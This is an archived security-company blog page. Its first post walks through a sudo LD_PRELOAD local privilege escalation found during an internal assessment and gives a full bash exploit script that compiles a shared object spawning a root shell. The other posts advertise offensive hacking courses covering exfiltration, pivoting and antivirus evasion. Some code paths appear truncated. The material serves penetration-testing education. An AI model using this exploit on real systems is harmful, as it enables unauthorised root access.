Grey bar Blue bar
Share this:

Wed, 28 Aug 2013

Something about sudo, Kingcope and re-inventing the wheel

Willems and I are currently on an internal assessment and have popped a couple hundred (thousand?) RHEL machines, which was trivial since they are all imaged. Anyhoo - long story short, we have a user which is allowed to make use of sudo for a few commands, such as reboot and service. I immediately thought it would be nice to turn this into a local root somehow. Service seemed promising and I had a looksy how it works. Whilst it does do sanitation of the library path it does not remove LD_PRELOAD. So if we could sneak LD_PRELOAD past sudo then all should be good ?

For lack of deeper understanding I googled around the issue and came across which is a vanilla LD_PRELOAD example overiding glib's fopen() call. That sort of suited me well since I reckoned starting services will prolly read config files.

So after a little fiddling I came up with the following creature:

/* gcc -Wall -fPIC -shared -o myfopen.c */
/* */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

FILE *fopen(const char *path, const char *mode) {
printf("MAKE ME A SANDWICH\n");
if (access("/tmp/sandwich", F_OK) != -1)
//printf("fake fopen: not active \n");
return NULL;

which could be invoked via

touch /tmp/sandwich
sudo LD_PRELOAD=/home/george/Desktop/playground/ld_preload/ /etc/init.d/ssh restart

Best thing was it sort of worked! Ugly but functioning...
While trying to work out the finer details, however, I came across a sploit Kingcope had written in 2008, which exploited exactly this issue! Apparently older sudos did not "Defaults env_reset" or "Defaults setenv" which makes the LD_PRELOAD possible. (This still applies to [mis]configurations which preserve the environment)
As always with Kingcope sploits it is very elegant and definitely worth a look.

On a side note: the header of his sploit says:

#* Sudo <= 1.6.9p18 local r00t exploit
#* by Kingcope/2008/
# Most lame exploit EVER!
# Needs a special configuration in the sudoers file:
# --->>>>> "Defaults setenv" so environ vars are preserved :) <<<<<---
# May also need the current users password to be typed in
# So this exploit is UBERLAME!
# First Argument to this shell file: A program your current
# user is allowed to execute via sudo. sudo has to be in
# the path!!
# successfully tested on FreeBSD-7.0 and RedHat Linux
# I don't even know why I realease such stuffz

so Kingcope considered the vuln UEBERLAME ... I don't know if I should be proud or sad for having found it five years later then....
Anyhoo, at this point I was already pretty invested in the thing and decided to see the re-invention of the wheel through. Kingcope's shared object was a lot slicker than mine, hooking into _init() rather than fopen() which makes it a lot more generic and elegant. He used unsetenv(LD_PRELOAD) to execute but once which is also a lot more elegant.

So I shamelessly stole from his sploit... I don't see the need for a suid shell stager and fancy execls when a simple system() does the job, but I am prolly missing several points =) So without further waffle here it is - its called sandwhich sploit as an homage to the classic XKCD sudo comic.

1 #!/bin/bash
2 #
3 # old/misconfigured sudo local root
4 #
5 # disclosed by Kingcope in 2008
6 #
7 #
8 # "re-discovered" in 2013 by
9 #
10 #
13 echo
14 echo "[!] $0 - sudo un-sanitised environment sploit"
15 echo "[!] usage: $0 <program to run via sudo> "
16 echo
19 cat > /tmp/sandwich.c << _EOF
20 #include <stdio.h>
21 #include <stdlib.h>
22 #include <unistd.h>
23 #include <sys/types.h>
25 void _init()
26 {
27 if (!geteuid())
28 {
29 unsetenv("LD_PRELOAD");
30 setgid(0);
31 setuid(0);
32 unlink("/tmp/");
33 unlink("/tmp/sandwich.c");
34 system("/bin/bash");
35 }
36 }
38 _EOF
41 gcc -fPIC -shared -o /tmp/ /tmp/sandwich.c -nostartfiles
42 sudo LD_PRELOAD=/tmp/ $1

Wed, 12 Jun 2013

Black Hat Vegas 2013 - Course Summaries

We have an updated breakdown of our BlackHat courses here

With the 'early registration' discount period coming to an end on May 31, I wanted to provide an overview of what courses we're offering and how those courses fit together.

Please be sure to take advantage of these discounted prices whilst they're still available. This summary will help you decide which course is best for you...

1. "Cadet" is our intro course. It provides the theoretical and practical base required to get the most of our other courses. Don't let the introduction title put you off, this course sets the stage for the rest of the course, and indeed fills in many blanks people might have when performing offensive security assessments. We only offer it on the weekend (27th & 28th) but its really popular so we've opened a 2nd classroom. Plenty of space available, so sign up!

2. "Bootcamp" is our novice course. Its a legendary program that we've offered successfully for almost 10 years now. The course is modified and updated each year to reflect new thinking, paradigms and attack vectors, but its real beauty is in the fundamental and unchanging principles and thinking skills it presents. We've opened up additional classrooms also, so we can accommodate plenty of people.

3. Our "Unplugged" course is an entry-level wireless security-training course. It is done in the same style as our other HBN courses; highly practical with a focus on learning how things work, not just the tricks. Last year "Unplugged" sold out quickly but this year we have additional space. But please sign up before we can't take any more people there.

4. "BlackOps" is a student's final course in the Hacking By Numbers series before being deployed into "Combat." In BlackOps, students will sharpen their skills in real-world scenarios before being shipped off to battle. BlackOps covers tools and techniques to brush up your skills on data exfiltration, privilege escalation, pivoting, client-side attacks and harnessing OSINT. Students will also focus on practical elements of attacking commonly found systems and staying under the radar. BlackOps also sold really well last year, and and we can't open additional classrooms, so please sign up early.

5. "Mobile" is our very first Mobile Hacking course, and the first of its kind for beginners in this field. As mobile phone usage continues to grow at an outstanding rate, this course shows you how you would go about testing the mobile platforms and installed applications. "Mobile" will give you a complete and practical window into the methods used when attacking mobile platforms. This course is ideal for penetration testers who are new to the mobile area. Our enrolments have just reached double-figures and seats are limited, so please sign up early.

If you need help selecting the right course, or getting registered, please contact us via training[at]sensepost[dot]com.

About 50 people have already signed up. Register now to benefit from the early-registration discounts and join us in Vegas in July!

Fri, 31 May 2013

BlackOps Hacking Training - Las Vegas

Get some.

BlackOps you say?
At SensePost we have quite a range of courses in our Hacking by Numbers series. We feel each one has its own special place. I've delivered almost all the courses over the years, but my somewhat biased favourite is our relatively new BlackOps Edition. Myself (Glenn) and Vlad will be presenting this course at BlackHat Vegas in July.

Where Does BlackOps fit in?
Our introductory courses (Cadet and Bootcamp) are meant to establish the hacker mindset - they introduce the student to psychological aspects of an attacker, and build on that to demonstrate real world capability. BlackOps is designed for students who understand the basics of hacking (either from attending Bootcamp/Cadet, or from other experience) and want to acquire deeper knowledge of techniques. We built the course based on our 12 years of experience of performing security assessments.

But really, what's the course about?
This course is aimed at those who've been penetration testing for a while, but still feel a bit lost when they've compromised a host, or network and want to know the best possible approach to take for the next step. All of the labs in this course come from real life assessments, with the final lab being a full-blown social engineering attack against an admin with pivoting, exfiltration and the works. Specifically, we're going to cover the following topics:

1. Introduction to Scripting
A hacker who can automate a task is an efficient and effective attacker.

2. Advanced Targeting
A hacker who can quickly and effectively identify targets is a successful attacker. We'll be looking at non-standard techniques for identifying targets, such as mDNS, IPv6, and even Pastebin.

3. Compromise
You may know how to roll a generic metasploit payload, but we'll be looking at some lesser utilised approaches to compromis. From WPAD injection, to rogue routers in IPv6, to good old smbrelay attacks.

4. Privilege Escalation
Following on somewhat succinctly, how do you elevate your privileges after compromising a box? Everyone wants to be root or enterprise admin.

5. Pivoting
Once you've compromised a lowly developer's test server on the edge of the network, or the receptionist PC, how do you bounce through that box to get to the good stuff, three DMZs deep? We'll show you how.

6. Exfiltration
A good hacker knows that finding the jewels is only half the battle - smuggling them out can be just as hard. We'll look at how we can use non-standard communication channels to exfiltrate data out of a compromised network. Company X has just deployed a really expensive DLP solution, but you really need to get this data out, how do you bypass it?

7. Client Side Attacks
The weakest layer of the OSI stack - the human. Made ├╝ber popular over the past 18 months, this is Unit 61398 in action.

8. Camouflage (new for Vegas 2013!)

During the infiltration phase of any attack, a hacker will ultimately need to try and execute code on the target system - whether achieved by means of phishing, payload delivery through an exploit or social engineering - running the code on the target system is the ultimate goal of most cyber attacks in the wild. What this means is that an attacker will need to be capable of bypassing any host-based protection software deployed on the target system for successful exploitation.
This module will run you through the techniques, methods and software currently used by the those targeting large corporates to achieve AV immunity in under any circumstances.

Each module of the above modules is followed by a practical lab to allow you to practise your newly acquired skills. The course finishes with a Capture-the-Flag, with a grand prize. Honestly, this final lab is enjoyable and guaranteed to bring a smile on your face whilst doing it.

We're looking forward to sharing out knowledge, experience, and passion for security with you. Please sign up here.

-Glenn & Vlad

Thu, 23 May 2013

Stay low, move fast, shoot first, die last, one shot, one kill, no luck, pure skill ...

We're excited to be presenting our Hacking By Numbers Combat course again at Black Hat USA this year. SensePost's resident German haxor dude Georg-Christian Pranschke will be presenting this year's course. Combat fits in right at the top of our course offerings. No messing about, this really is the course where your sole aim is to pwn as much of the infrastructure and applications as possible. It is for the security professional looking to hone their skill-set, or to think like those in Unit 61398. There are a few assumptions though:

  • you have an excellent grounding in terms of infrastructure - and application assessments

  • you aren't scared of tackling systems that aren't easily owned using Metasploit

  • gaining root is an almost OCD-like obsession

  • there are no basic introductions into linux, shells, pivoting etc.

As we've always said, it is quite literally an all-hack, no-talk course. We are not going to dictate what tools or technologies get used by students. We don't care if you use ruby or perl or python to break something (we do, actually - we don't like ruby), just as long as it gets broken. The Combat course itself is a series of between 12 and 15 (depending on time) capture the flag type exercises presented over a period of two days. The exercises include infrastructure, reverse engineering and crypto.

These targets come from real life assessments we've faced at SensePost, it's about as real as you can get without having to do the report at the end of it. How it works is that candidates are presented with a specific goal. If the presenter is feeling generous at the time, they may even get a description of the technology. After that, they'll have time to solve the puzzle. Afterwards, there will be a discussion about the failings, takeaways and alternate approaches adopted by the class. The latter is normally fascinating as (as anybody in the industry knows), there are virtually a limitless number of different ways to solve specific problems. This means that even the instructor gets to learn a couple of new tricks (we also have prizes for those who teach them enough new tricks).

In 2012, Combat underwent a massive rework and we presented a virtually new course which went down excellently. We're aiming to do the same this year, and to make it the best Combat course ever. So if you're interested in spending two days' worth of intense thinking solving some fairly unique puzzles and shelling boxen, join us for HBN Combat at BlackHat USA.

Mon, 20 May 2013

Your first mobile assessment

Monday morning, raring for a week of pwnage and you see you've just been handed a new assessment, awesome. The problem? It's a mobile assessment and you've never done one before. What do you do, approach your team leader and ask for another assessment? He's going to tell you to learn how to do a mobile assessment and do it quickly, there are plenty more to come.

Now you set out on your journey into mobile assessments and you get lucky, the application that needs to be assessed is an Android app. A few Google searches later and you are feeling pretty confident about this, Android assessments are meant to be easy, there are even a few tools out there that "do it all". You download the latest and greatest version, run it and the app gets a clean bill of health. After all, the tool says so, there is no attack surface; no exposed intents and the permissions all check out. You compile your report, hand it off to the client and a week later the client gets owned through the application... Apparently the backend servers were accepting application input without performing any authentication checks. Furthermore, all user input was trusted and no server side validation was being performed. What went wrong? How did you miss these basic mistakes? After-all, you followed all the steps, you ran the best tools and you ticked all the boxes. Unfortunately this approach is wrong, mobile assessments are not always simply about running a tool, a lot of the time they require the same steps used to test web applications, just applied in a different manner. This is where SensePost's Hacking by numbers: Mobile comes to the fore, the course aims to introduce you to mobile training from the ground up.

The course offers hands-on training, introducing techniques for assessing applications on Android, IOS, RIM and Windows 8. Some of the areas covered include:

  • Communication protocols

  • Programming languages for mobile development

  • Building your own mobile penetration testing lab

  • Mobile application analysis

  • Static Analysis

  • Authentication and authorization

  • Data validation

  • Session management

  • Transport layer security and information disclosure

Unlike other mobile training or tutorials that focus on a specific platform or a specific tool on that platform, Hacking by Numbers aims to give you the knowledge to perform assessments on any platform with a well established methodology. Building on everything taught in the Hacking by Numbers series, the mobile course aims to move assessments into mobile sphere, continuing the strong tradition of pwnage. The labs are a direct result of the assessments we've done for clients. Our trainers do this on a weekly basis, so you get the knowledge learned from assessing numerous apps over the last few years.

On your next mobile assessment you'll be able to do both static and dynamic analysis of mobile applications. You will know where to find those credit card numbers stored on the phone and how to intercept traffic between the application and the backend servers.

The course: Hacking by numbers: Mobile